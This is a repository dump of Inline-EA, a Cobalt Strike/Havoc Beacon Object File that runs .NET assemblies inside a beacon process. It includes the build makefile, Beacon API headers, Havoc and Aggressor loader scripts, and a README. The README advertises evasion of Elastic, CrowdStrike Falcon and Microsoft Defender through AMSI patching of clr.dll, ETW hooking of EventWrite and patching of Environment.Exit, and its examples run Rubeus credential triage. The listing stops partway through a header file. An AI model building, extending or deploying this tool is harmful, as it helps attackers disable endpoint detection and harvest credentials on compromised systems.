├── prebuilt ├── inline-ea.x64.o ├── inline-ea.x86.o ├── Inline-EA.py └── Inline-EA.cna ├── makefile ├── src ├── fcntl.h ├── beacon.h ├── inline-ea.h ├── main.cpp └── metahost.h └── README.md /prebuilt/inline-ea.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EricEsquivel/Inline-EA/HEAD/prebuilt/inline-ea.x64.o -------------------------------------------------------------------------------- /prebuilt/inline-ea.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/EricEsquivel/Inline-EA/HEAD/prebuilt/inline-ea.x86.o -------------------------------------------------------------------------------- /makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := inline-ea 2 | DIST_DIR := prebuilt 3 | SRC_DIR := src 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | CC_x86 := i686-w64-mingw32-gcc 6 | 7 | all: 8 | $(CC_x64) -o $(DIST_DIR)/$(BOFNAME).x64.o -Os -c $(SRC_DIR)/main.cpp 9 | $(CC_x86) -o $(DIST_DIR)/$(BOFNAME).x86.o -Os -c $(SRC_DIR)/main.cpp 10 | 11 | clean: 12 | rm -f $(DIST_DIR)/*.o -------------------------------------------------------------------------------- /src/fcntl.h: -------------------------------------------------------------------------------- 1 | /* 2 | * File definitions 3 | * 4 | * Derived from the mingw header written by Colin Peters. 5 | * Modified for Wine use by Jon Griffiths and Francois Gouget. 6 | * This file is in the public domain. 7 | */ 8 | #ifndef __WINE_FCNTL_H 9 | #define __WINE_FCNTL_H 10 | 11 | #include 12 | 13 | #define _O_RDONLY 0 14 | #define _O_WRONLY 1 15 | #define _O_RDWR 2 16 | #define _O_ACCMODE (_O_RDONLY|_O_WRONLY|_O_RDWR) 17 | #define _O_APPEND 0x0008 18 | #define _O_RANDOM 0x0010 19 | #define _O_SEQUENTIAL 0x0020 20 | #define _O_TEMPORARY 0x0040 21 | #define _O_NOINHERIT 0x0080 22 | #define _O_CREAT 0x0100 23 | #define _O_TRUNC 0x0200 24 | #define _O_EXCL 0x0400 25 | #define _O_SHORT_LIVED 0x1000 26 | #define _O_TEXT 0x4000 27 | #define _O_BINARY 0x8000 28 | #define _O_RAW _O_BINARY 29 | 30 | #define _O_WTEXT 0x10000 31 | #define _O_U16TEXT 0x20000 32 | #define _O_U8TEXT 0x40000 33 | 34 | #define O_RDONLY _O_RDONLY 35 | #define O_WRONLY _O_WRONLY 36 | #define O_RDWR _O_RDWR 37 | #define O_ACCMODE _O_ACCMODE 38 | #define O_APPEND _O_APPEND 39 | #define O_RANDOM _O_RANDOM 40 | #define O_SEQUENTIAL _O_SEQUENTIAL 41 | #define O_TEMPORARY _O_TEMPORARY 42 | #define O_NOINHERIT _O_NOINHERIT 43 | #define O_CREAT _O_CREAT 44 | #define O_TRUNC _O_TRUNC 45 | #define O_EXCL _O_EXCL 46 | #define O_TEXT _O_TEXT 47 | #define O_BINARY _O_BINARY 48 | #define O_RAW _O_BINARY 49 | 50 | #endif /* __WINE_FCNTL_H */ 51 | -------------------------------------------------------------------------------- /prebuilt/Inline-EA.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand 2 | 3 | def inline_ea( demonID, * param: tuple ): 4 | TaskID : str = None 5 | demon : Demon = None 6 | packer : Packer = Packer() 7 | 8 | demon = Demon( demonID ) 9 | BOF_ENTRY = "go" 10 | BOF_NAME = f"inline-ea.{ demon.ProcessArch }.o" 11 | 12 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, f"Tasked demon to execute inline assembly" ) 13 | 14 | if len( param ) < 2: 15 | demon.ConsoleWrite( demon.CONSOLE_ERROR, f"Invalid number of arguments" ) 16 | return False 17 | 18 | PatchAmsi = False 19 | PatchEtw = False 20 | PatchExit = False 21 | 22 | DotnetAssembly, *args = param 23 | DotnetArgumentsList = [] 24 | 25 | for arg in args: 26 | if arg == "--amsi": 27 | PatchAmsi = True 28 | elif arg == "--etw": 29 | PatchEtw = True 30 | elif arg == "--patchexit": 31 | PatchExit = True 32 | else: 33 | DotnetArgumentsList.append( arg ) 34 | 35 | DotnetArguments = " ".join( DotnetArgumentsList ) 36 | 37 | AssemblyBytes = b"" 38 | with open( DotnetAssembly, "rb" ) as f: 39 | AssemblyBytes = f.read() 40 | 41 | AssemblyLength = len( AssemblyBytes ) 42 | 43 | if not AssemblyBytes: 44 | demon.ConsoleWrite( demon.CONSOLE_ERROR, f"Failed to read assembly file" ) 45 | return False 46 | 47 | # pack arguments 48 | packer.addbytes( AssemblyBytes ) 49 | packer.addint( AssemblyLength ) 50 | packer.addWstr( DotnetArguments ) 51 | packer.addint( PatchExit ) 52 | packer.addint( PatchAmsi ) 53 | packer.addint( PatchEtw ) 54 | 55 | BOF_PARAMS = packer.getbuffer() 56 | demon.InlineExecute( 57 | TaskID, 58 | BOF_ENTRY, 59 | BOF_NAME, 60 | BOF_PARAMS, 61 | False 62 | ) 63 | 64 | return TaskID 65 | 66 | RegisterCommand( inline_ea, "", "inline-ea", "Execute .NET assemblies in the current beacon process. All optional arguments must be at the end of the command.", 0, "/path/to/Assembly.exe [arguments...] [--patchexit] [--amsi] [--etw]", "/opt/SharpTools/NetFramework_4.0_x64/Rubeus.exe triage --amsi --etw --patchexit") -------------------------------------------------------------------------------- /prebuilt/Inline-EA.cna: -------------------------------------------------------------------------------- 1 | #Register command 2 | beacon_command_register( 3 | "inline-ea", 4 | "Execute .NET assemblies in the current beacon process. All optional arguments must be at the end of the command.", 5 | "Synopsis: inline-ea /path/to/Assembly.exe [arguments...] [--patchexit] [--amsi] [--etw]\n" . 6 | "Description:\n" . 7 | " Execute a .NET assembly in the current beacon process.\n\n" . 8 | " --patchexit Optional. Patches System.Environment.Exit (flagged by Elastic).\n" . 9 | " --amsi Optional. Patches AmsiScanBuffer string in clr.dll to bypass AMSI.\n" . 10 | " --etw Optional. EAT Hooks advapi32.dll!EventWrite to bypass ETW.\n\n" . 11 | "Examples:\n" . 12 | " inline-ea /path/to/Rubeus.exe triage --amsi --etw --patchexit\n" . 13 | " inline-ea /path/to/Powerpick.exe whoami /all --amsi --etw\n" 14 | ); 15 | 16 | alias inline-ea { 17 | $data = substr($0, 9); 18 | @args = split(" ", $data); 19 | 20 | if (size(@_) < 3) 21 | { 22 | berror($1, "Invalid number of arguments! (See 'help inline-ea')"); 23 | return -1; 24 | } 25 | 26 | btask($1, "Tasked beacon to inline execute inline-ea!"); 27 | $barch = barch($1); 28 | $dotnetassembly = $2; 29 | 30 | $patchExitflag = 0; 31 | $patchAmsiflag = 0; 32 | $patchEtwflag = 0; 33 | 34 | $result = ""; 35 | for ($i = 0; $i < size(@args); $i++) { 36 | $arg = @args[$i]; 37 | if ($arg eq "--patchexit") { 38 | $patchExitflag = 1; 39 | } else if ($arg eq "--amsi") { 40 | $patchAmsiflag = 1; 41 | } else if ($arg eq "--etw") { 42 | $patchEtwflag = 1; 43 | } else if ($arg eq "$dotnetassembly") { 44 | continue; 45 | } else { 46 | $result .= $arg . " "; 47 | } 48 | } 49 | 50 | # Remove trailing space if it exists 51 | $result = substr($result, 1, -1); 52 | $arguments = $result; 53 | 54 | #Reading assembly bytes and get the size in bytes 55 | $fileHandle = openf($dotnetassembly); 56 | $assemblyLength = lof($dotnetassembly); 57 | $assemblyBytes = readb($fileHandle, -1); 58 | closef($fileHandle); 59 | 60 | if($assemblyLength < 1) 61 | { 62 | berror($1,"Error: Specified .NET assembly could not be found. Please ensure the file exists!"); 63 | return; 64 | } 65 | println($assemblyLength) 66 | 67 | # Read BOF file 68 | $handle = openf(script_resource("inline-ea. $+ $barch $+ .o")); 69 | $bof = readb($handle, -1); 70 | closef($handle); 71 | if(strlen($bof) < 1) 72 | { 73 | berror($1,"Error: BOF bin could not be found. Please ensure the compiled BOF (.o file) exists in the same folder as this aggressor script"); 74 | return; 75 | } 76 | 77 | println("$arguments"); 78 | 79 | # Prepare the arguments 80 | $args = bof_pack($1, "biZiii", $assemblyBytes, $assemblyLength, $arguments, $patchExitflag, $patchAmsiflag, $patchEtwflag); 81 | beacon_inline_execute($1, $bof, "go", $args); # $args 82 | } 83 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Inline-EA 2 | Inline-EA is a Beacon Object File (BOF) to execute .NET assemblies in your current Beacon process. 3 | This tool was built to bypass the latest Elastic at the time of making, version 8.17.4. This tool also works against CrowdStrike Falcon and Microsoft Defender for Endpoint (MDE). 4 | 5 | ## Features 6 | 7 | - Load necessary CLR DLLs using LoadLibraryShim to evade ICLRRuntimeInfo::GetInterface callstack detections 8 | - Load a console from backed memory by using APCs 9 | - Bypass AMSI by patching clr.dll instead of amsi.dll to avoid common detections 10 | - Bypass ETW by EAT Hooking advapi32.dll!EventWrite to point to a function that returns right away 11 | - Patches System.Environment.Exit to prevent Beacon process from exiting 12 | 13 | ## Usage 14 | 15 | You can compile by going into the `src/` directory and running `x86_64-w64-mingw32-gcc -c main.cpp -o inline-ea.x64.o`. 16 | 17 | Put the `inline-ea.cna` Aggressor Script and `inline-ea.x64.o` BOF into the same directory, then load `inline-ea.cna` into your Script Manager. 18 | 19 | You can run the help command in your Beacon console with: `help inline-ea` 20 | 21 | To run .NET assemblies, use the command: `inline-ea /Path/To/Assembly.exe [arguments...]` 22 | 23 | Optionally: 24 | `--amsi` and `--etw` flags can be used to bypass AMSI and ETW respectively. 25 | `--patchexit` flag can be used to patch System.Environment.Exit, though this isn't always necessary and it does get detected by Elastic. 26 | 27 | ``` 28 | beacon> help inline-ea 29 | Synopsis: inline-ea /path/to/Assembly.exe [arguments...] [--patchexit] [--amsi] [--etw] 30 | Description: 31 | Execute a .NET assembly in the current beacon process. 32 | 33 | --patchexit Optional. Patches System.Environment.Exit (flagged by Elastic). 34 | --amsi Optional. Patches AmsiScanBuffer string in clr.dll to bypass AMSI. 35 | --etw Optional. EAT Hooks advapi32.dll!EventWrite to bypass ETW. 36 | 37 | Examples: 38 | inline-ea /path/to/Rubeus.exe triage --amsi --etw --patchexit 39 | inline-ea /path/to/Powerpick.exe whoami /all --amsi --etw 40 | ``` 41 | 42 | ## Demo 43 | View the full demo against all 3 security products on my [website](https://ericesquivel.github.io/posts/inline-ea) 44 | 45 | ## Resources 46 | 47 | * [InlineExecute-Assembly](https://github.com/anthemtotheego/InlineExecute-Assembly) by AnthemToTheEgo - Provided a base template for inline executing .NET assemblies in C in a BOF. I just had to port it from C to C++. 48 | * [Maldev Academy](https://maldevacademy.com) - Contained a great module for inline executing .NET assemblies in C++ as a normal program, but not as a BOF. I combined this and AnthemToTheEgo's project to execute .NET assemblies in C++ as a BOF. 49 | * [Unmanaged .NET Patching](https://kyleavery.com/posts/unmanaged-dotnet-patching) by Kyle Avery - Resource on how to patch System.Environment.Exit. 50 | * [New AMSI Bypass Technique Modifying CLR.DLL in Memory](https://practicalsecurityanalytics.com/new-amsi-bypss-technique-modifying-clr-dll-in-memory) by Practical Security Analytics LLC - Patching clr.dll to bypass AMSI. 51 | * [EAT Hooking](https://www.unknowncheats.me/forum/c-and-c/50426-eat-hooking-dlls.html) by Jimster480 - I came up with the idea to bypass ETW by EAT Hooking advapi32.dll!EventWrite and I found this general EAT Hooking code snippet which worked great. 52 | -------------------------------------------------------------------------------- /src/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Additional BOF resources are available here: 8 | * - https://github.com/Cobalt-Strike/bof_template 9 | * 10 | * Cobalt Strike 4.x 11 | * ChangeLog: 12 | * 1/25/2022: updated for 4.5 13 | * 7/18/2023: Added BeaconInformation API for 4.9 14 | * 7/31/2023: Added Key/Value store APIs for 4.9 15 | * BeaconAddValue, BeaconGetValue, and BeaconRemoveValue 16 | * 8/31/2023: Added Data store APIs for 4.9 17 | * BeaconDataStoreGetItem, BeaconDataStoreProtectItem, 18 | * BeaconDataStoreUnprotectItem, and BeaconDataStoreMaxEntries 19 | * 9/01/2023: Added BeaconGetCustomUserData API for 4.9 20 | * 3/21/2024: Updated BeaconInformation API for 4.10 to return a BOOL 21 | * Updated the BEACON_INFO data structure to add new parameters 22 | * 4/19/2024: Added BeaconGetSyscallInformation API for 4.10 23 | * 4/25/2024: Added APIs to call Beacon's system call implementation 24 | */ 25 | #ifndef _BEACON_H_ 26 | #define _BEACON_H_ 27 | #include 28 | 29 | #ifdef __cplusplus 30 | extern "C" { 31 | #endif // __cplusplus 32 | 33 | /* data API */ 34 | typedef struct { 35 | char * original; /* the original buffer [so we can free it] */ 36 | char * buffer; /* current pointer into our buffer */ 37 | int length; /* remaining length of data */ 38 | int size; /* total size of this buffer */ 39 | } datap; 40 | 41 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 42 | DECLSPEC_IMPORT char * BeaconDataPtr(datap * parser, int size); 43 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 44 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 45 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 46 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 47 | 48 | /* format API */ 49 | typedef struct { 50 | char * original; /* the original buffer [so we can free it] */ 51 | char * buffer; /* current pointer into our buffer */ 52 | int length; /* remaining length of data */ 53 | int size; /* total size of this buffer */ 54 | } formatp; 55 | 56 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 57 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 58 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, const char * text, int len); 59 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, const char * fmt, ...); 60 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 61 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 62 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 63 | 64 | /* Output Functions */ 65 | #define CALLBACK_OUTPUT 0x0 66 | #define CALLBACK_OUTPUT_OEM 0x1e 67 | #define CALLBACK_OUTPUT_UTF8 0x20 68 | #define CALLBACK_ERROR 0x0d 69 | #define CALLBACK_CUSTOM 0x1000 70 | #define CALLBACK_CUSTOM_LAST 0x13ff 71 | 72 | 73 | DECLSPEC_IMPORT void BeaconOutput(int type, const char * data, int len); 74 | DECLSPEC_IMPORT void BeaconPrintf(int type, const char * fmt, ...); 75 | 76 | 77 | /* Token Functions */ 78 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 79 | DECLSPEC_IMPORT void BeaconRevertToken(); 80 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 81 | 82 | /* Spawn+Inject Functions */ 83 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 84 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 85 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 86 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo); 87 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 88 | 89 | /* Utility Functions */ 90 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 91 | 92 | /* Beacon Information */ 93 | /* 94 | * ptr - pointer to the base address of the allocated memory. 95 | * size - the number of bytes allocated for the ptr. 96 | */ 97 | typedef struct { 98 | char * ptr; 99 | size_t size; 100 | } HEAP_RECORD; 101 | #define MASK_SIZE 13 102 | 103 | /* Information the user can set in the USER_DATA via a UDRL */ 104 | typedef enum { 105 | PURPOSE_EMPTY, 106 | PURPOSE_GENERIC_BUFFER, 107 | PURPOSE_BEACON_MEMORY, 108 | PURPOSE_SLEEPMASK_MEMORY, 109 | PURPOSE_BOF_MEMORY, 110 | PURPOSE_USER_DEFINED_MEMORY = 1000 111 | } ALLOCATED_MEMORY_PURPOSE; 112 | 113 | typedef enum { 114 | LABEL_EMPTY, 115 | LABEL_BUFFER, 116 | LABEL_PEHEADER, 117 | LABEL_TEXT, 118 | LABEL_RDATA, 119 | LABEL_DATA, 120 | LABEL_PDATA, 121 | LABEL_RELOC, 122 | LABEL_USER_DEFINED = 1000 123 | } ALLOCATED_MEMORY_LABEL; 124 | 125 | typedef enum { 126 | METHOD_UNKNOWN, 127 | METHOD_VIRTUALALLOC, 128 | METHOD_HEAPALLOC, 129 | METHOD_MODULESTOMP, 130 | METHOD_NTMAPVIEW, 131 | METHOD_USER_DEFINED = 1000, 132 | } ALLOCATED_MEMORY_ALLOCATION_METHOD; 133 | 134 | /** 135 | * This structure allows the user to provide additional information 136 | * about the allocated heap for cleanup. It is mandatory to provide 137 | * the HeapHandle but the DestroyHeap Boolean can be used to indicate 138 | * whether the clean up code should destroy the heap or simply free the pages. 139 | * This is useful in situations where a loader allocates memory in the 140 | * processes current heap. 141 | */ 142 | typedef struct _HEAPALLOC_INFO { 143 | PVOID HeapHandle; 144 | BOOL DestroyHeap; 145 | } HEAPALLOC_INFO, *PHEAPALLOC_INFO; 146 | 147 | typedef struct _MODULESTOMP_INFO { 148 | HMODULE ModuleHandle; 149 | } MODULESTOMP_INFO, *PMODULESTOMP_INFO; 150 | 151 | typedef union _ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION { 152 | HEAPALLOC_INFO HeapAllocInfo; 153 | MODULESTOMP_INFO ModuleStompInfo; 154 | PVOID Custom; 155 | } ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION; 156 | 157 | typedef struct _ALLOCATED_MEMORY_CLEANUP_INFORMATION { 158 | BOOL Cleanup; 159 | ALLOCATED_MEMORY_ALLOCATION_METHOD AllocationMethod; 160 | ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION AdditionalCleanupInformation; 161 | } ALLOCATED_MEMORY_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_CLEANUP_INFORMATION; 162 | 163 | typedef struct _ALLOCATED_MEMORY_SECTION { 164 | ALLOCATED_MEMORY_LABEL Label; // A label to simplify Sleepmask development 165 | PVOID BaseAddress; // Pointer to virtual address of section 166 | SIZE_T VirtualSize; // Virtual size of the section 167 | DWORD CurrentProtect; // Current memory protection of the section 168 | DWORD PreviousProtect; // The previous memory protection of the section (prior to masking/unmasking) 169 | BOOL MaskSection; // A boolean to indicate whether the section should be masked 170 | } ALLOCATED_MEMORY_SECTION, *PALLOCATED_MEMORY_SECTION; 171 | 172 | typedef struct _ALLOCATED_MEMORY_REGION { 173 | ALLOCATED_MEMORY_PURPOSE Purpose; // A label to indicate the purpose of the allocated memory 174 | PVOID AllocationBase; // The base address of the allocated memory block 175 | SIZE_T RegionSize; // The size of the allocated memory block 176 | DWORD Type; // The type of memory allocated 177 | ALLOCATED_MEMORY_SECTION Sections[8]; // An array of section information structures 178 | ALLOCATED_MEMORY_CLEANUP_INFORMATION CleanupInformation; // Information required to cleanup the allocation 179 | } ALLOCATED_MEMORY_REGION, *PALLOCATED_MEMORY_REGION; 180 | 181 | typedef struct { 182 | ALLOCATED_MEMORY_REGION AllocatedMemoryRegions[6]; 183 | } ALLOCATED_MEMORY, *PALLOCATED_MEMORY; 184 | 185 | /* 186 | * version - The version of the beacon dll was added for release 4.10 187 | * version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch 188 | * e.g. 0x040900 -> CS 4.9 189 | * 0x041000 -> CS 4.10 190 | * 191 | * sleep_mask_ptr - pointer to the sleep mask base address 192 | * sleep_mask_text_size - the sleep mask text section size 193 | * sleep_mask_total_size - the sleep mask total memory size 194 | * 195 | * beacon_ptr - pointer to beacon's base address 196 | * The stage.obfuscate flag affects this value when using CS default loader. 197 | * true: beacon_ptr = allocated_buffer - 0x1000 (Not a valid address) 198 | * false: beacon_ptr = allocated_buffer (A valid address) 199 | * For a UDRL the beacon_ptr will be set to the 1st argument to DllMain 200 | * when the 2nd argument is set to DLL_PROCESS_ATTACH. 201 | * heap_records - list of memory addresses on the heap beacon wants to mask. 202 | * The list is terminated by the HEAP_RECORD.ptr set to NULL. 203 | * mask - the mask that beacon randomly generated to apply 204 | * 205 | * Added in version 4.10 206 | * allocatedMemory - An ALLOCATED_MEMORY structure that can be set in the USER_DATA 207 | * via a UDRL. 208 | */ 209 | typedef struct { 210 | unsigned int version; 211 | char * sleep_mask_ptr; 212 | DWORD sleep_mask_text_size; 213 | DWORD sleep_mask_total_size; 214 | 215 | char * beacon_ptr; 216 | HEAP_RECORD * heap_records; 217 | char mask[MASK_SIZE]; 218 | 219 | ALLOCATED_MEMORY allocatedMemory; 220 | } BEACON_INFO, *PBEACON_INFO; 221 | 222 | DECLSPEC_IMPORT BOOL BeaconInformation(PBEACON_INFO info); 223 | 224 | /* Key/Value store functions 225 | * These functions are used to associate a key to a memory address and save 226 | * that information into beacon. These memory addresses can then be 227 | * retrieved in a subsequent execution of a BOF. 228 | * 229 | * key - the key will be converted to a hash which is used to locate the 230 | * memory address. 231 | * 232 | * ptr - a memory address to save. 233 | * 234 | * Considerations: 235 | * - The contents at the memory address is not masked by beacon. 236 | * - The contents at the memory address is not released by beacon. 237 | * 238 | */ 239 | DECLSPEC_IMPORT BOOL BeaconAddValue(const char * key, void * ptr); 240 | DECLSPEC_IMPORT void * BeaconGetValue(const char * key); 241 | DECLSPEC_IMPORT BOOL BeaconRemoveValue(const char * key); 242 | 243 | /* Beacon Data Store functions 244 | * These functions are used to access items in Beacon's Data Store. 245 | * BeaconDataStoreGetItem returns NULL if the index does not exist. 246 | * 247 | * The contents are masked by default, and BOFs must unprotect the entry 248 | * before accessing the data buffer. BOFs must also protect the entry 249 | * after the data is not used anymore. 250 | * 251 | */ 252 | 253 | #define DATA_STORE_TYPE_EMPTY 0 254 | #define DATA_STORE_TYPE_GENERAL_FILE 1 255 | 256 | typedef struct { 257 | int type; 258 | DWORD64 hash; 259 | BOOL masked; 260 | char* buffer; 261 | size_t length; 262 | } DATA_STORE_OBJECT, *PDATA_STORE_OBJECT; 263 | 264 | DECLSPEC_IMPORT PDATA_STORE_OBJECT BeaconDataStoreGetItem(size_t index); 265 | DECLSPEC_IMPORT void BeaconDataStoreProtectItem(size_t index); 266 | DECLSPEC_IMPORT void BeaconDataStoreUnprotectItem(size_t index); 267 | DECLSPEC_IMPORT size_t BeaconDataStoreMaxEntries(); 268 | 269 | /* Beacon User Data functions */ 270 | DECLSPEC_IMPORT char * BeaconGetCustomUserData(); 271 | 272 | /* Beacon System call */ 273 | /* Syscalls API */ 274 | typedef struct 275 | { 276 | PVOID fnAddr; 277 | PVOID jmpAddr; 278 | DWORD sysnum; 279 | } SYSCALL_API_ENTRY, *PSYSCALL_API_ENTRY; 280 | 281 | typedef struct 282 | { 283 | SYSCALL_API_ENTRY ntAllocateVirtualMemory; 284 | SYSCALL_API_ENTRY ntProtectVirtualMemory; 285 | SYSCALL_API_ENTRY ntFreeVirtualMemory; 286 | SYSCALL_API_ENTRY ntGetContextThread; 287 | SYSCALL_API_ENTRY ntSetContextThread; 288 | SYSCALL_API_ENTRY ntResumeThread; 289 | SYSCALL_API_ENTRY ntCreateThreadEx; 290 | SYSCALL_API_ENTRY ntOpenProcess; 291 | SYSCALL_API_ENTRY ntOpenThread; 292 | SYSCALL_API_ENTRY ntClose; 293 | SYSCALL_API_ENTRY ntCreateSection; 294 | SYSCALL_API_ENTRY ntMapViewOfSection; 295 | SYSCALL_API_ENTRY ntUnmapViewOfSection; 296 | SYSCALL_API_ENTRY ntQueryVirtualMemory; 297 | SYSCALL_API_ENTRY ntDuplicateObject; 298 | SYSCALL_API_ENTRY ntReadVirtualMemory; 299 | SYSCALL_API_ENTRY ntWriteVirtualMemory; 300 | SYSCALL_API_ENTRY ntReadFile; 301 | SYSCALL_API_ENTRY ntWriteFile; 302 | SYSCALL_API_ENTRY ntCreateFile; 303 | } SYSCALL_API, *PSYSCALL_API; 304 | 305 | /* Additional Run Time Library (RTL) addresses used to support system calls. 306 | * If they are not set then system calls that require them will fall back 307 | * to the Standard Windows API. 308 | * 309 | * Required to support the following system calls: 310 | * ntCreateFile 311 | */ 312 | typedef struct 313 | { 314 | PVOID rtlDosPathNameToNtPathNameUWithStatusAddr; 315 | PVOID rtlFreeHeapAddr; 316 | PVOID rtlGetProcessHeapAddr; 317 | } RTL_API, *PRTL_API; 318 | 319 | typedef struct 320 | { 321 | PSYSCALL_API syscalls; 322 | PRTL_API rtls; 323 | } BEACON_SYSCALLS, *PBEACON_SYSCALLS; 324 | 325 | DECLSPEC_IMPORT BOOL BeaconGetSyscallInformation(PBEACON_SYSCALLS info, BOOL resolveIfNotInitialized); 326 | 327 | /* Beacon System call functions which will use the current system call method */ 328 | DECLSPEC_IMPORT LPVOID BeaconVirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 329 | DECLSPEC_IMPORT LPVOID BeaconVirtualAllocEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 330 | DECLSPEC_IMPORT BOOL BeaconVirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 331 | DECLSPEC_IMPORT BOOL BeaconVirtualProtectEx(HANDLE processHandle, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 332 | DECLSPEC_IMPORT BOOL BeaconVirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType); 333 | DECLSPEC_IMPORT BOOL BeaconGetThreadContext(HANDLE threadHandle, PCONTEXT threadContext); 334 | DECLSPEC_IMPORT BOOL BeaconSetThreadContext(HANDLE threadHandle, PCONTEXT threadContext); 335 | DECLSPEC_IMPORT DWORD BeaconResumeThread(HANDLE threadHandle); 336 | DECLSPEC_IMPORT HANDLE BeaconOpenProcess(DWORD desiredAccess, BOOL inheritHandle, DWORD processId); 337 | DECLSPEC_IMPORT HANDLE BeaconOpenThread(DWORD desiredAccess, BOOL inheritHandle, DWORD threadId); 338 | DECLSPEC_IMPORT BOOL BeaconCloseHandle(HANDLE object); 339 | DECLSPEC_IMPORT BOOL BeaconUnmapViewOfFile(LPCVOID baseAddress); 340 | DECLSPEC_IMPORT SIZE_T BeaconVirtualQuery(LPCVOID address, PMEMORY_BASIC_INFORMATION buffer, SIZE_T length); 341 | DECLSPEC_IMPORT BOOL BeaconDuplicateHandle(HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwOptions); 342 | DECLSPEC_IMPORT BOOL BeaconReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead); 343 | DECLSPEC_IMPORT BOOL BeaconWriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten); 344 | 345 | /* Beacon Gate APIs */ 346 | DECLSPEC_IMPORT VOID BeaconDisableBeaconGate(); 347 | DECLSPEC_IMPORT VOID BeaconEnableBeaconGate(); 348 | 349 | /* Beacon User Data 350 | * 351 | * version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch 352 | * e.g. 0x040900 -> CS 4.9 353 | * 0x041000 -> CS 4.10 354 | */ 355 | 356 | #define DLL_BEACON_USER_DATA 0x0d 357 | #define BEACON_USER_DATA_CUSTOM_SIZE 32 358 | typedef struct 359 | { 360 | unsigned int version; 361 | PSYSCALL_API syscalls; 362 | char custom[BEACON_USER_DATA_CUSTOM_SIZE]; 363 | PRTL_API rtls; 364 | PALLOCATED_MEMORY allocatedMemory; 365 | } USER_DATA, * PUSER_DATA; 366 | 367 | #ifdef __cplusplus 368 | } 369 | #endif // __cplusplus 370 | #endif // _BEACON_H_ 371 | -------------------------------------------------------------------------------- /src/inline-ea.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include "metahost.h" 8 | #include "fcntl.h" 9 | 10 | extern "C" { 11 | 12 | /*BOF Defs*/ 13 | 14 | DECLSPEC_IMPORT void BeaconPrintfW(int type, const wchar_t* fmt, ...); 15 | 16 | //MSVCRT 17 | WINBASEAPI int __cdecl MSVCRT$memcmp(const void *_Buf1,const void *_Buf2,size_t _Size); 18 | WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T); 19 | WINBASEAPI void* __cdecl MSVCRT$memcpy(void* __restrict _Dst, const void* __restrict _Src, size_t _MaxCount); 20 | WINBASEAPI void __cdecl MSVCRT$memset(void* dest, int c, size_t count); 21 | WINBASEAPI int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2); 22 | WINBASEAPI int __cdecl MSVCRT$_snprintf(char* s, size_t n, const char* fmt, ...); 23 | WINBASEAPI errno_t __cdecl MSVCRT$mbstowcs_s(size_t* pReturnValue, wchar_t* wcstr, size_t sizeInWords, const char* mbstr, size_t count); 24 | WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *_Str); 25 | WINBASEAPI char* WINAPI MSVCRT$_strlwr(char * str); 26 | WINBASEAPI char* WINAPI MSVCRT$strrchr(char * str); 27 | WINBASEAPI int __cdecl MSVCRT$_open_osfhandle(intptr_t osfhandle, int 